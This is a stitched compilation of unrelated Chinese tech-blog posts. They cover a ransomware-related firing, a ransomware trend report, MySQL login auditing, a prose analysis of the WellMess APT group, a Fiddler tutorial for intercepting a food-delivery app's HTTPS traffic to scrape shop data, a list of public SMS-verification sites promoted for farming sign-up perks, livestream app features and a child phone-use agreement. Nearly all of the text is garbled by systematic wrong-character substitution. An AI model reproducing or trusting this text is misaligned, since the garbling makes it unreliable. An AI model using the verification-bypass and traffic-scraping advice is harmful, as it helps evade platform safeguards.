徐九丨发自 思否编辑部 我问过同部门中毒的共事，他们的处罚是记功 + 罚款，领导是双倍。不过我却是解雇，所以我很不服，当初正筹备申请劳动仲裁。我本人感觉的话，我的职位是助理工程师（打杂的，写代码、报表什么都干），我过后申请的时候也确实没留神到我电脑明码太简略了，这部分是我的问题。不过公司并没有给我看是我电脑先中毒的证据，说不定是他人的电脑中毒了，扩散到其余电脑呢？而且就算是从我电脑开始被侵入的，我也认为并不全是我一个人的起因，公司方面的问题不是更大吗？而且其他人只是罚款记功，解雇对我太不偏心了。 近日，国内创意社区 V2EX 有一个帖子引起了大家的宽泛议论。 一位公司信息技术部的助理工程师因为公司中了勒索病毒，被公司 HR 发了一份解雇通知书。但当事人认为公司电脑中毒并不全是他一个人的起因，公司方面的问题更大，而且其他人只是罚款记功，解雇对其太不偏心了。 但公司 HR 示意病毒是从他的电脑开始侵入的，并且公司曾经告诉工会，向工会告诉拟解除与其的劳动合同，工会无不同意见。 事件起因依据当事人示意，公司是在端午节期间中的勒索病毒。公司服务器是有备份文件的，但可怜的是也被病毒加密了。公司通过找里面的公司，付款并解除了有备份的服务器的数据，大概用来四五天的工夫复原了相干数据。 事发之后公司 HR 找到其开始“劝退”，最后的理由是“公司环境不好”、“对其倒退不好”之类的起因，给其 15 天的工夫让其被动提交辞职申请，并以到职证实和家人对其进行压迫。 当事人当天便更新简历筹备寻找新工作，但示意在找到新工作之前十不会被动提交辞职申请。HR 理解这一状况并沟通有效后，几天之后并给了其一份解雇通知书： XX （信息技术部）2020 年 6 月 27 日，因为你在工作期间未能恪守公司规定，安全意识差，作为公司信息技术部技术人员为对本人的办公电脑设置平安防范措施，造成其办公电脑中毒、收到攻打，从而导致公司整个网络系统瘫坏、进行经营长达 5 天以及公司重要数据失落，重大影响公司的经营以及给公司造成重大损失（已超 20 万元人名币）。你的行为属于重大的失职，违反公司的规章制度。对于前述状况，公司曾经告诉工会，向工会告诉拟解除与你的劳动合同，工会无不同意见。 现公司依据公司《人力资源管理制度》以及《劳动合同法》第三十九条的规定，决定自 2020 年 7 月 24 日起解除与你的劳动合同关系。 当事人的质疑依据这位敌人所说，公司中毒的不止是他一台电脑，其部门就有 2 台，其余部门以及领导电脑都有中毒的，公司的服务器也是中了好几台。 出问题的网络端口是当事人于往年 4 月开明，次要是为了在家办公，尽管曾经停工了，然而因为公司没有虚构专用网络，而且周末有时候服务器或程序呈现一些问题须要连回公司，所以就没有敞开。 但其认为公司也存在很多问题： 这个性能是其在微信部门群里找部门的网络管理员开的，开明的时候并没有揭示其明码要批改之类的（一开始是 teamview 的，起初被商业检测了；其电脑登录明码只有 2 位）；入职的时候公司并没有安顿网络安全等培训；是开明近程端口不须要流程，其余共事在群里说一声就给能够给开始口；服务器没有打安全补丁，该公司是 windows server2012 （不晓得有没有补丁）；公司服务器备份文件是保留在服务器里的，导致服务器文件也被加密了，无奈还原；公司方面说病毒是从其电脑开始侵入的，是其周末不关电脑导致的所有电脑中毒，然而公司也没有给其看相干证据。正如文章结尾所说，当事人同部门的共事受到的处罚是记功+罚款，领导是双倍，所以对于这个处理结果示意不服并筹备申请劳动仲裁。 网友怎么看？帖子收回后，网友们纷纷发表了针对这件事件的认识。留言的大部分网友认为当事人是有责任的，但不应该负次要责任。 之所以被区别对待，一是安全意识问题，二是因为是新来的，所以最适宜“背锅”。 平安从业者在业内被戏称为“背锅侠”，一旦企业呈现安全事故，各种问题的锋芒都会指向公司的安全部门。不出事是应该的，一旦出了事就是疏忽大意、玩忽职守，扣奖金、扣绩效甚至间接解雇。 但随着互联网技术的一直倒退，网络攻击者也在一直的迭代新的攻打技术和开发新的歹意工具，因而并不存在完满的平安解决方案，有些危险在劫难逃。不过大部分的平安问题的确能够通过教训和相干的安全措施设置来防止，进而升高相干的平安危险。 你碰到过相似的事件么？你怎么看？ -END-

近日，腾讯平安正式对外公布《2020上半年勒索病毒报告》（以下简称“报告”）。《报告》显示，上半年寰球大型企业蒙受勒索病毒打击的事件仍然高频产生。其中，最沉闷的勒索病毒家族发动针对性极强的大型“狩猎”流动，对企业开出天价解密赎金；新型勒索病毒层出不穷，技术上一直进化。而勒索伎俩也从单纯的赎金换密钥，降级到不给赎金就公开秘密数据。腾讯平安也提供从威逼情报到平安产品的整体防护解决方案，帮助企业抵挡勒索病毒攻打。 据腾讯平安威逼情报大数据显示，2020上半年勒索病毒仍旧非常沉闷，但总体感化状况较去年略有降落。从勒索病毒攻打的地区散布看，广东、浙江、山东、河南、上海等经济较发达地区成为重点指标，其它省份也蒙受到不同水平攻打。从勒索病毒影响的行业看，数据价值较高的传统企业、教育、医疗、政府机构蒙受攻打最为重大，互联网、金融、能源行业紧随其后，也受到勒索病毒攻打影响。 攻打更精准，不交赎金立刻公开敏感数据因为攻打政企机构更容易取得赎金，于是沉闷勒索病毒团伙越来越多地将高价值大型政企机构作为重点打击对象。据《报告》显示，为了谋求利益最大化，少数状况下，攻击者在攻陷企业一台网络资产之后，会利用该资产继续浸透攻陷更多资产，之后大量植入文件加密模块，从而迫使企业在业务零碎大面积瘫痪的状况下缴纳赎金。 上图的勒索病毒样本仅针对特定指标的IT设施 此外，为防止勒索失败，攻击者还采取了新的勒索策略。即，先窃取政企机构敏感数据，再对企业资产进行加密。如果企业回绝缴纳赎金解密，就在暗网“羞耻墙”页面公开企业局部敏感数据进一步施行勒索，若企业仍然回绝缴纳赎金，勒索团伙就会间接公开所窃取的企业敏感数据。对于大型企业而言，数据泄露带来的不止有经济上的损失，还会重大影响企业形象，使本身失去公众信赖。因而，面对这种以泄露数据为伎俩的勒索攻打，就算企业有数据备份，也只能被迫抉择领取赎金。 加密、单干、定制化，勒索病毒技术手段降级通过长期的演变，勒索病毒在“勒索”这件事上越发成熟。 首先，为了对攻打指标进行精准打击，很多勒索病毒会利用僵尸网络宏大的感化基数进行迅速扩张。例如GandCrab勒索团伙就借助Phorpiex僵尸网络的继续投递获利超20亿美金。而新开发出的勒索家族为了疾速切入市场，也会抉择与僵尸网络进行单干以取得市场知名度。据《报告》显示，僵尸网络已成为勒索病毒传播渠道的中坚力量，在勒索病毒事件溯源中的占比越来越高。 其次，为了晋升加密效率升高资源耗费，勒索病毒作者在加密流程的细节上进行优化。从晚期的单线程文件加密，降级到针对每个磁盘分区进行多线程加密；从繁多的x86可执行病毒版本到减少x64可执行版本；利用高危破绽进行内核提权，或应用压缩打包的形式进行提权来加密更多文件等等。此外，勒索病毒还开始扩充加密范畴，不止加密文件，同时对文件名也进行加密。 值得一提的是，勒索病毒还开始了“联手”单干。腾讯平安专家察看发现，有攻击者携带不止一种勒索病毒。据揣测，这可能是攻击者为防止繁多病毒因为平安环境等问题导致的加密失败，而开始与多个勒索病毒家族单干。同时，更多的勒索病毒开始针对国内市场做优化，例如减少中文版本的勒索函件，勒索加密扩大后缀应用具备国内格调的命名形式等。由此可见，国内仍然为勒索团伙关注最为亲密的市场之一。 增强信息安全建设，保障企业不被“勒索”面对严厉的勒索病毒威逼态势，《报告》中指出可依照“三不三要”思路进行日常平安治理，以进步企事业单位及政府机构的网络安全意识。即题目吸引人的未知邮件不要点开、不轻易关上电子邮件附件、不随便点击电子邮件中的附带网址；重要材料要备份、开启电子邮件前确认发件人可信、零碎补丁/安全软件病毒库放弃实时更新。 同时，腾讯平安专家揭示宽广政企用户，可依据业务节点拦挡地位部署业余的平安产品，并依据腾讯平安威逼情报中心提供的情报数据配置各节点联防联动、对立协调治理，晋升整体网络抗攻击能力。 此外，专家还倡议个人用户装置腾讯电脑管家、企业客户部署腾讯T-Sec终端平安管理系统拦挡查杀各类勒索病毒，爱护各终端节点。同时，启用腾讯电脑管家「文档守护者」，该性能集成针对支流勒索病毒的解密计划，并提供欠缺的数据备份计划，为数千万用户提供文档爱护复原服务。

古代社会中大多数人容易遗记明码，因而，为了不便，各大网站或者APP就相继呈现以手机号码进行短信验证来注册和登录等操作。但此时，大多集体手机号码都曾经是实名认证的，就十分怕存在个人信息泄露的状况。那么长期在线收费短信接管验证码的网站就应运而生。 在此，举荐一些国内外的短信验证码接管平台，简直所有相似平台都是收费的，选取一个长期手机号码进行操作，取得的所有的短信验证码在平台上全副公开，所有人都能够查看。所以自己倡议，千万不要应用这些长期手机号码进行注册登录金融理财等利用，或者长期应用以及波及个人隐私的利用。 国内短信验证码接管平台：收信箱： [https://www.shouxinxiang.com/] 中国、美国、缅甸、香港、澳门 云短信： https://www.materialtools.com/ 中国、美国 收费接码： https://www.becmd.com/ 中国、美国、英国、加拿大 Z-SMS： http://www.z-sms.com/ 中国、缅甸、美国、韩国、俄罗斯、英国、马来西亚日本、菲律宾、香港、澳门、泰国 随弃随用: https://www.suiyongsuiqi.com/ 中国 Shejiinn: http://www.shejiinn.com/ 缅甸、英国 国外短信验证码接管平台Receive-SMS-Online: http://receive-sms-online.info/ Receive-SMS: https://receive-sms.com/ Receive SMS Online for free: https://sms-online.co/receive... Mytrashmobile: https://de.mytrashmobile.com/ 其中也有挺多收不到的短信的号码，国内的一些网站很多都没方法失常应用，但相较于挺多还是能是应用的号码，不必这些号码做什么守法的事件，这些无需注册登录平台所给的收费号码还是能不便了大家的，不必再思考个人隐私问题，就可让大家薅有限的羊毛。 感兴趣的能够去理解一下哦~尽管不能保障都能应用。

作者：王少鹏爱可生 DBA 团队成员，负责我的项目数据库日常问题解决及公司 DMP 平台问题解决，对数据库有强烈的趣味。认为不会游泳的厨师绝不是一个好数据库工程师。本文起源：原创投稿*爱可生开源社区出品，原创内容未经受权不得随便应用，转载请分割小编并注明起源。 背景某日某公司的测试数据库突发告警！ 故障初步定位很可能是新来的几位实习生没有恪守运维标准，误操作（没加 where 条件）删表导致服务异样，目前还没确认操作用户身份。 DELETE TABLE XXXXX;（ 环境 autocommit=1 ，没有手动开启事务 ）只管测试环境不影响线上利用，但影响了新性能开发进度，暴露出运维治理上的破绽。 通过以上案例思考，MySQL 自身并没有操作审计的性能，又如何依据现有的性能进行行为剖析，防止喜剧再次发生？ 文章整顿了运维时罕用的定位 MySQL 操作用户办法，帮你疾速查看用户行为记录。 一、思路设置 init_connect 参数；创立用户连贯信息表；通过 binlog 日志进行查看执行的危险 SQL 语句；通过 thread_id 找到对应的用户及起源 IP 地址。init_connect 参数的性能：当用户在客户端连贯 MySQL 时，隐式执行的一条自定义的 SQL 语句（参数值）。 留神： 开启 binlog 日志记录性能；对领有 super_priv 权限的用户有效。二、筹备工作2.1 init_connect 参数mysql> show variables like 'init_connect';+---------------+-------+| Variable_name | Value |+---------------+-------+| init_connect | |+---------------+-------+1 row in set (0.00 sec)mysql> set global init_connect='insert into auditdb.accesslog(connectionID,ConnUser,MatchUser,LoginTime) values(connection_id(),user(),current_user(),now());';Query OK, 0 rows affected (0.00 sec)mysql> show variables like 'init_connect';+---------------+-------------------------------------------------------------------------------------------------------------------------------+| Variable_name | Value |+---------------+-------------------------------------------------------------------------------------------------------------------------------+| init_connect | insert into auditd.accesslog(connectionID,ConnUser,MatchUser,LoginTime) values(connection_id(),user(),current_user(),now()); |+---------------+-------------------------------------------------------------------------------------------------------------------------------+1 row in set (0.00 sec)既然是要 insert 一条数据，那是不是这个普通用户要对这张表领有 insert 权限呢？ ...

【导读】7月16日（昨天），美国网络安全和基础设施安全局（CISA），英国国家网络安全核心（NCSC），加拿大通信安全机构（CSE）和美国国家安全局（NSA）公布了一份联结报告，称APT29组织应用WellMess系列工具针对美国、英国和加拿大的新冠病毒钻研和疫苗研发相干机构动员攻打。值得注意的是，报告中该重点提及的“WellMess”正是一例全新APT组织，2019年360平安大脑就已捕捉并发现了WellMess组织一系列的APT攻打流动，并将其命名为“魔鼠”，独自编号为APT-C-42。更为惊险的是，360平安大脑披露，从2017年12月开始，WellMess组织便通过网络浸透和供应链攻打作战之术，瞄准国内某网络根底服务提供商，发动了定向攻打。 神秘APT组织WellMess被揭秘！ 就在刚刚，360平安大脑披露了一例从未被外界公开的神秘APT组织——WellMess组织，并将其命名为“魔鼠”，独自编号为APT-C-42。从2017年12月起始终继续到2019年12月，WellMess组织先后对某机构服务器、某网络根底服务提供商，进行长期的攻打渗透活动。 尽管，2018年日本互联网应急响应核心曾报道过该组织的相干攻打流动，但那次只是将wellmess及其僵尸网络归为未知的Golang恶意软件。 而这一次，基于WellMess组织独特攻打特点和精细攻打技战术，360平安大脑确定并国内首家将其定义为APT组织。 为更进一步理解这例全新的、神秘的APT组织，智库分为以下四问，顺次具体解析： 【一问】 WellMess组织凭何被归属于APT组织行列？ 寻根究底，这里咱们先回看下什么是APT，据百科介绍： APT（Advanced Persistent Threat）：又名高级持续性威逼，是指隐匿而长久的网络入侵过程。其通常是出于政治、军事或经济动机，由国家级黑客组织精心操刀策动，针对特定组织或国家动员的持续性攻打。 APT攻打具备三个特色：高级、长期、威逼。 高级：强调应用简单精细的恶意软件及技术以利用零碎中的破绽；长期：暗指某个内部力量会继续监控特定指标，并从其获取数据；威逼：则指人为的或国家级黑客参加策动的攻打。而依据360平安大脑披露的报告中，咱们发现WellMess组织备其以下特点： 攻击能力上：善于应用GO语言构建攻打武器，具备Windows和Linux双平台攻击能力；攻打时长上：对指标的针对性极强，对指标进行了较长时间的管制；攻打威逼上：攻打后期进行了周密策划，针对指标和关联指标动员了供应链攻打口头。基于上述WellMess组织的攻打特点与APT攻打定义与要害因素根本吻合，所以360平安大脑认定WellMess组织为一起新的APT组织。 而在命名考量上，因为WellMess是一种在Golang中编程的恶意软件，而又因Golang语言的吉祥物为地鼠，与此同时“Mess”谐音 “Mise”，故而360平安大脑将这例新APT组织命名为“魔鼠”。 这里还有一些乏味的中央，报告称，WellMess是该组织的一个外围函数名，通过剖析其性能本来的全称含意可能为“WelcomeMessage”。从另一个角度看这个命名，“Mess”单词译意为凌乱，所以，这个函数名外表兴许是来自攻击者表白欢送的信息，而背面也能够了解为攻击者要制作“彻底的凌乱”。 【二问】 WellMess组织的攻打技术有多厉害？ 依据昨天，美国网络安全和基础设施安全局（CISA），英国国家网络安全核心（NCSC），加拿大通信安全机构（CSE）和美国国家安全局（NSA）公布的联结报告，咱们能够看到：WellMess组织针对美国、英国和加拿大的新冠病毒钻研和疫苗研发相干机构动员了攻打。 而实际上，360平安大脑追踪溯源发现： 最早于2017年12月，WellMess组织便针对某机构的服务器进行了网络浸透攻打。直到2019年8月-2019年9月期间，WellMess组织又将重点攻打指标转向为某网络根底服务提供商，该公司的产品是各机构宽泛应用的网络根底服务零碎。 在攻打影响剖析上，咱们能够从对该组织的技战术攻打过程中，窥知一二。 通过借鉴ATT&CK，360平安大脑将WellMsess的攻打技战术过程，分为如下三个阶段： 供应链入侵阶段该组织通过架设歹意VPN服务器的形式进行钓鱼攻打，用社会工程学的形式诱导指标连贯歹意VPN服务器，达到近程植入木马后门的成果。 边界入侵阶段该组织对多个指标施行了网络攻击，局部攻打是通过安全漏洞入侵指标网络的服务器，同时疑似通过失陷供应商的信赖关系，获取账户明码接入指标网络边界服务（如VPN、邮件服务等）。 内网后浸透阶段该组织在攻陷指标机器之后，会装置专属的后门程序，控制目标机器进行信息收集和横向挪动，同时为了口头的不便也会建设代理跳板隧道不便内网浸透。 而从“供应链入侵”到“边界入侵”再到“内网后浸透”，狡黠的WellMsess组织，采取“曲折”作战之术，并以“环环相扣”联动之姿，进行了长期的埋伏浸透。然而，上文咱们曾经讲到，WellMsess组织供应链攻打的重点指标为某网络根底服务提供商公司，而其产品又是各机构宽泛应用的网络根底服务零碎。 由此可见，咱们所将接受的攻打影响，将是“攻破一点，伤及一片”的“覆灭级”杀伤力，整个国家网络系统或者都处于最危险的边缘之境。 【三问】 对于WellMess组织的具体攻击行为剖析？ Part 1：供应链攻击行为剖析 承接上文，如此神秘又弱小的攻打组织，如此“低调又能制作凌乱”的军团，如此“牵一发如动全身”的供应链攻打，其具体又是如何操作的呢？依据360平安大脑提供的报告显示： 某风行VPN产品的客户端降级程序存在安全漏洞，攻击者通过架设歹意的VPN服务器，通过社会工程学形式诱使该公司产品技术人员登陆，当技术人员应用存在破绽的VPN 客户端连贯歹意的VPN服务器时，将主动下载歹意的更新包并执行。攻击者下发的恶意程序是该组织的专属下载者程序WellMess_Downloader，下载并植入的最终的后门是WellMess_Botlib。 整体攻打流程，如下图所示： 对于上文提到的某VPN厂商VPN客户端破绽：该破绽被利用时为在朝0day破绽状态，由360平安大脑捕捉并报告给该厂商，单方确认破绽编号（SRC-2020-281）并跟进解决。 Part 2：服务器浸透攻击行为剖析 然而，除上述利用VPN客户端破绽，发动供应链攻打外，在晚期WellMess组织还针对指标服务器，发动了针对性的网络浸透。其具体攻击行为如下： WellMess组织会先通过对公网服务器攻打，获得肯定权限，下发并启动wellmess专用后门，用于维持shell权限，后门会定时反向连贯C&C，通过近程管制命令实现收集信息、内网横向挪动、设置内网端口转发等操作。而且因为服务器很少重启，所以该组织本身并没有内置设计长久化性能。攻打流程图如下： 值得注意的是，在服务器攻打中，WellMess组织用到了后门组件（包含GO类型后门和.Net类型后门）、长久化组件、第三方工具等攻打组件。 而对于上述两大攻击行为，360平安大脑依据其个性将其别离代号为WellVpn和WellServ。 【四问】 *WellMess组织的幕后“操盘手”为谁？* 因为在历史攻打数据中，暂未关联到与此次WellMess攻打模式类似的数据，目前只能通过此次攻打口头的攻打痕迹揣测幕后组织的归属，360平安大脑对攻打工夫范畴和样本编译工夫范畴进行统计分析。 · 近程shell按小时统计时区(UTC+0) · 落地样本编译工夫按小时统计时区(UTC+0) 依据攻击者近程shell的日志工夫和样本的编译工夫法则显示，该组织是来源于时区UTC+3即东三时区地区的国家。 智  库  时  评 高山一声惊雷起，揭开万倾网络攻防风波战。能够说，此次全新APT组织的披露，无疑为网络安全的世界再蒙一层冰霜。尤其是在网络战早已成为大国博弈重要伎俩之下，WellMess组织以其高隐秘性、广目标性、强杀伤性的供应链攻打，令寰球的网络系统犹如不定时炸弹一样，随时会在临界点中“暴发”。 针对如此强劲的APT高阶威逼攻打，请相干单位提高警惕，爱护好要害网络基础设施的平安，同时对客户端做好平安漏洞补丁的更新，并定期进行病毒查杀。 ...

Ps：抓app上的https包须要手机开启root权限和下载EdXposed框架！具体参考上一篇文章 下载fiddler并且配置环境 下载链接进去Download Now就好了装置完当前关上找到的导航栏中的Tools>>Options>>Connections,勾上Allow remote computers to connect(容许近程连贯)，这里端口默认是8888能够改，上面有用到。关上旁边的HTTPS打上三个勾（当初能够抓网页的https了）导出证书（app须要这个证书能力抓包），点击旁边的Actions,抉择第二个导出证书到桌面。手机上安装证书，关上后装置即可，名字谁便填。手机上的配置（手机和电脑须要同一网络） 关上wlan（就是设置wifi的中央）关上更多设置。代理设置为手动，主机名为电脑的vlan ip地址，端口默认的8888能够改抓包 当初能够抓包了，除了图片咱们须要的更多的往往的店铺的数据，又因为店铺的数据在传输的过程中是应用json传输的，所以咱们要拿到json包这里咱们能够纯熟的应用命令行的性能，清屏：cls等等。当初咱们关上一个饿了么的店铺咱们能够看到有4个json包连一起，外面两个最大包的这就是这个店铺的数据了，外面有所有咱们想要的货色，当初咱们把它保留到本地在下面右键Save >> Selected Sessions >> as text(保留为记事本，第一个是保留为zip格局的压缩包，压缩包太麻烦咱们就保留记事本好了)Ps：好了咱们曾经胜利的抓取了app上https的包，下一篇文章我会教你如何应用Java对json包进行编译和导出到excel表中

依据Mob研究院公布的《2020中国直播行业风波洞察》显示，2020年3月我国泛娱乐直播行业移动用户规模超过1.5亿人。从整体用户规模来看，近一年内，泛娱乐直播行业移动用户规模稳定较小，根本维持在1.6亿量级。市场进入存量竞争阶段，将来各大平台将会摸索更多元的商业模式。泛娱乐直播蕴含游戏直播和娱乐直播。 数据起源：Mob研究院、中商产业研究院整顿 那么做好一场娱乐直播APP软件外围的性能需要？ 咱们须要从2个维度去剖析 1：主播 主播起到了连贯用户和产品的作用，所以，抉择人，能不能将用户带入到一种购物生产的场景之下，显得分外重要 美颜  首先颜值要是用户所喜爱，加上美颜吸引人群就更高。人都是诗句动物 背景音乐的设置是吸引用户的停留率，只有在一个好的气氛下，用户才会花更多工夫停留 设置宿愿单 减少客户的互动 设置粉丝团  确定客户的留存以及精确度 麦克风、摄像头——开启/敞开/翻转 感觉播放的品质 镜头翻转  确保不同的播放格局 主播PK、分享直播间、设置房间模式、直播时长、房间布告、美颜、 都是减少用户的粘性 再从用户的维度剖析： 送礼物：礼物类型（一般、贵族、粉丝团、守护礼物）、礼物飘窗、礼物特效 主播宿愿单展现 退出粉丝团： 守护主播 充值 开明贵族 用户工作：直播间签到、关注主播、分享直播间等工作 静音、红包等性能 以上的多有性能都是满足客户在直播能达到标新立异，举世无双的成果，满足客户肯定的虚荣心理。 结束语：做一场胜利直播主播和用户缺一不好，同时须要有本人弱小的运行团队去推广，写好脚本，以至于直播间的内容更受欢迎！

当你将第一部智能手机交给孩子时，请不要让他们在毫无准备的状况下进入数字世界。科技公司高管詹妮弗·朱·斯科特(Jennifer Zhu Scott)在她的孩子们拿到手机后与他们签订了一份长达三页的应用协定，并附上了一些连成年人也应该思考遵循的倡议。 对许多现代人而言，拿到人生中的第一部智能手机，仿佛成为了一种古代典礼。父母兴许会认为，孩子到了肯定的年龄（这个年龄取决于他们的家庭和文化）他们就曾经筹备好领有属于他们本人的智能手机、进入数字世界了。然而，随同手机而来的是大多数父母的担心。他们的孩子会不会太依赖电子设备?他们能晓得如何负责任地应用这些电子设备吗？ 几年前，一家科技投资公司的高管—詹妮弗·朱·斯科特(Jennifer Zhu Scott)和丈夫决定在两个女儿的10岁生日时送给她们人生的第一部智能手机。 但在这个过程中，她发现自己也陷入了大多数家长面临的处境：对于孩子应用智能设施好坏的焦虑与思考。但与许多父母不同的是，她十分分明她的孩子将面临的“危险”。因为，她的业余畛域是“大公司如何应用用户的集体数据”，在她所处的工作平台就对于用户行为有着更多的控制权。 为了确保女儿们能避开潜在的危险，她还采取了一项来自她本人行业的策略：让她们签订了一份用户协定  (https://drive.google.com/file...，这份三页的协定分明地表明，智能手机不仅仅是一个小工具或玩具。“手机不仅仅是一项技术。如果使用不当，它可能成为一种危及你的平安或将来名誉的武器”协定还说，“你始终都是个好孩子，咱们想确保你持续做出理智的抉择。” 在这份蕴含15个要点的协定中，斯科特让她的孩子们在每一点上都签上本人的名字，来表明她们浏览并且了解了这一点的内容。在协定中，她们必须批准与她分享她们的明码；必须在注册社交媒体账户之前申请容许；必须对骚扰或奇怪的电话短信放弃公开坦诚；必须答复任何对于她们如何应用手机的问题。该协定的一部分自身就是互联网隐衷速成课程。协定诉诸她的女儿连一些成年人也会常常遗记的事件：咱们在网上公布的所有货色都有可能以咱们无奈设想的形式被浏览、应用和销售。思考到这一点，以下是她认为每个孩子在第一次应用智能手机之前都应该晓得的事件： 协定第13点内容如下：“我明确我的集体数据将是我成长过程中最有价值的资产。我晓得很多收费的应用程序之所以是收费是因为他们想通过发售我的集体数据获益。我许可在下载和登录任何应用程序之前与我的父母沟通。”斯科特解释说：“当你把你的数据收回去时，想想你会失去什么，不仅仅是益处，它还存在潜在的危险。”像Facebook、Gmail和谷歌这样的收费应用程序都有本人的变现模式，其实都并不是外表上看起来的“收费”。这些公司会扫描你的帖子、邮件和搜寻后果，以便将定制的广告、内容和搜寻后果反馈给你。 这看起来是一个为收费的服务领取的正当代价，但斯科特正告说，这并不是。首先，Facebook和Gmail每年从用户的集体数据中赚取数十亿美元。她还指出，在2016年美国总统选举和2016年英国退欧公投中，Facebook数据是如何通过误导指标广告操纵选民的。因而，你在社交媒体平台上看到的信息并不全是公正、中立和正确的，这所有甚至能够由未知的第三方来决定。这些内容会影响咱们的决策和生存，所以当孩子（和咱们其他人）提供数据给第三方时，他们其实是冒着让本人被科技巨头管制的危险。斯科特说：“对于咱们的孩子来说，如果在他们长大后想成为一个独立的人，明天把他们的数据公开将会影响他们在多大程度上只能生存在自在意志的空想中。” 这是因为，正如协定中的第12点揭示孩子们的那样，“我上传到互联网上的所有内容都将永恒留在网上，而且在99%的状况下，我将失去对这些内容的所有权。”当初有了可用的软件，其他人很容易通过一张照片来操纵图片和制作虚伪视频片段，这项技术在将来只会变得更加弱小。斯科特说：“咱们不晓得10年后当咱们的孩子长大了会产生什么，也不晓得人们能对你在网上公布的一张照片做什么。”出于这个起因，她主张在公布照片时要极其激进。 防止发送一些你不想转发的短信或照片给学校里的任何人。斯科特说：“如果它是数字化的，它很有可能是永久性的。”任何收到短信的人都能够通过截屏或转发来与别人分享信息，即便你只是给你信赖的人发送信息，他们的手机和邮件也可能会被黑。只管这可能让人感到不难受，但她提倡和你的孩子真诚地谈谈，在他们遇到第一手问题之前，不要发送色情和裸照。所以第5点内容如下：“我永远不会发送或接管裸体照片或任何其余不适当的内容。 我明确这可能会有重大的法律结果，会危及我和我的家人的将来。” 协定第6点是：“我永远不会搜寻那些如果被奶奶看到会让我难堪的货色。”这是斯科特试图想出的一种无效的避免她的孩子在谷歌上过分追寻他们天生的好奇心的方法，并在不适合或危险的内容上遇到阻碍后得出的论断。因为她不能始终监督女儿，所以她试图用虚构的形式来灌输这种思维。她的策略仿佛见效了，她说，“我的女儿，尤其是我的小女儿，说，‘天哪，我始终在想这件事。’” 用你的手机养成良好的习惯和礼仪，就像你在生存的其余中央练习时一样。斯科特让她的女儿批准不在走路的时候发短信，不在与敌人和家人相处的时候应用手机，也不用感觉有任务立刻回复信息。协定中是这么写的：“领有本人的生存”。为了避免咱们大多数人都经验过的无休止的滑动屏幕综合症（scrolling syndrome），特地是在那些软弱的深夜和凌晨，她要求她的女儿每天晚上8点把手机交给她。如果没有，“在你晓得之前，你就会在睡觉前几个小时被手机吸引”斯科特说。她补充到，让你的手机在另一个房间充电“是爱护你的家庭生存和心理健康的一种形式。” 就像当咱们睡不着的时候关上一个应用程序太吸引人一样，手机也很容易让咱们轻率地回复短信，而后第二天(或几分钟)就会开始悔恨。出于这个起因，她通知孩子们在回复不确定的短信之前先“睡一觉”。更好的是，如果你必须解决辣手的状况，就亲自去做而“不要通过短信说那些你不会当面说的话，”斯科特在协定中写道。 在你发帖子之前想一下——十年后你会怎么想?斯科特的孩子们批准第7点，其中写道：“我了解我在手机上的行为会影响我将来的名誉——即便是以我无奈预测或看到的形式。”她通过给孩子们看10年前他们本人衣着尿布的照片反复强调这一点。“他们说，‘哦，太恶心了，真难堪，’” “我说，‘嗯，你晓得，在你那个年纪，你不会感觉难堪。”社交媒体上的帖子也是一样:明天看起来很乏味的货色，10年或20年后可能会让人感到惭愧。 斯科特指出，“当你是一个坏蛋时，你不会在网上出现一个齐全不同的形象。”因为社交媒体是一种流传信息的弱小形式，她催促她的孩子以及所有人，认真思考他们在社交媒体上公布的内容。她问：“你是否帮忙流传踊跃的信息、建设性的信息和感性的信息?” 对于孩子和科技，界线很重要，信赖也很重要。例如，协定中的第2点，斯科特领有她所有孩子的明码，但她很少应用它们。 当初成为负责任的数字公民还为时不晚。斯科特说：“咱们这一代人进入社交媒体时不晓得什么是什么，咱们就这么进去了。”然而成年人依然有方法补救失去的工夫。 对于同样身为父母的数字公民，她有个倡议：请不要在网上公布你孩子的照片。斯科特说：“当我看到人们把他们宝宝的照片放到推特上时，我的心都疼了。”当你的孩子有一天决定成为社交媒体的影响者时，不要提前为他们做决定，他们也可能心愿在互联网上齐全匿名。她说：“我只是认为父母不应该在孩子还没来得及做决定之前就把这些信息泄露进来。” 到目前为止，斯科特认为她和孩子们的用户协定停顿顺利。“我为我的孩子感到很开心，因为我的两个孩子都有很强的隐衷意识和数据意识。” 浏览原文

segmentfault 思否 垃圾昨天早上八点到早晨12点（期间就吃了2顿饭）都在整顿笔记，因为还没整顿结束，就保留草稿。明天早上起来，就点了一下“编辑”，竟然。。。昨天做了一整天的笔记，全副都没有了，我靠。。。。。。我靠。。。。。。我靠。。。。。。我靠。。。。。。我忍了 segmentfault 思否 垃圾明天，又花了一天的工夫去整顿昨天的笔记，从新一遍有一遍的捉弄操作系统，小心翼翼的截图，形容，下午公布了一点内容，而后也始终整顿笔记，而后今晚，就在刚刚，此刻，从下午到当初的草稿，竟然。。。。。。又tmd全副没有了 segmentfault 思否 垃圾

产业互联网疾速倒退的同时也面临诸多平安挑战，平安威逼的倒退出现出新的特色和局势，利用零碎面临的威逼环境一直变动，其安全形势仍不容乐观。钻研机构近年来对网络安全态势的分析表明，由应用软件破绽导致的安全事件始终占据着排行榜靠前地位，这些安全事件既造成了重大的数据泄露，又对企业的生产经营带来了重大影响。 美国国家标准与技术研究所（NIST）评估，如果在利用零碎上线之后进行软件破绽修复，其修复老本是需要设计阶段修复老本的几十倍，所以应用软件的平安品质不仅仅是测试进去的，更是设计开发进去的。腾讯平安专家咨询中心从客户视角登程，联合腾讯外部利用平安开发的实践经验，针对企业用户如何设计开发建设利用平安开发体系，给出具体的能力清单和领导框架，汇聚成通用性的利用平安开发能力图谱，旨在帮忙企业在产业互联网转型过程中晋升应用软件平安品质，从源头升高平安危险。 关注腾讯平安（公众号：TXAQ2019） 回复【利用平安开发能力图谱】获取原图 腾讯利用平安开发能力图谱提出了六大能力：平安开发治理能力、平安开发需要能力、平安开发设计能力、平安开发编码能力、平安开发测试能力和平安开发成熟度评估能力。 平安开发治理能力是平安开发体系指路明灯；平安开发需要能力是平安开发体系可能落地的关键因素；平安开发设计能力是平安开发落地的重要动作；平安开发编码能力是落地不二法门；平安测试能力是继续迭代的重要保障；平安开发成熟度评估能力是迷信的度量。六大能力笼罩了利用平安开发生命周期的次要场景，在建设利用平安开发体系建设时具备较高的参考价值。 平安开发治理能力 发展利用开发平安体系建设，首先要建设一个适合的平安开发组织架构。正当的平安组织架构是平安开发可能建设落地重要撑持，依据组织、人员和开发流程建设起正当的平安开发治理要求、平安开发环境、设定开发流程和平安控制点的无缝交融，做到全流程平安危险固化可视化，避免平安流程绕过。 平安开发需要能力 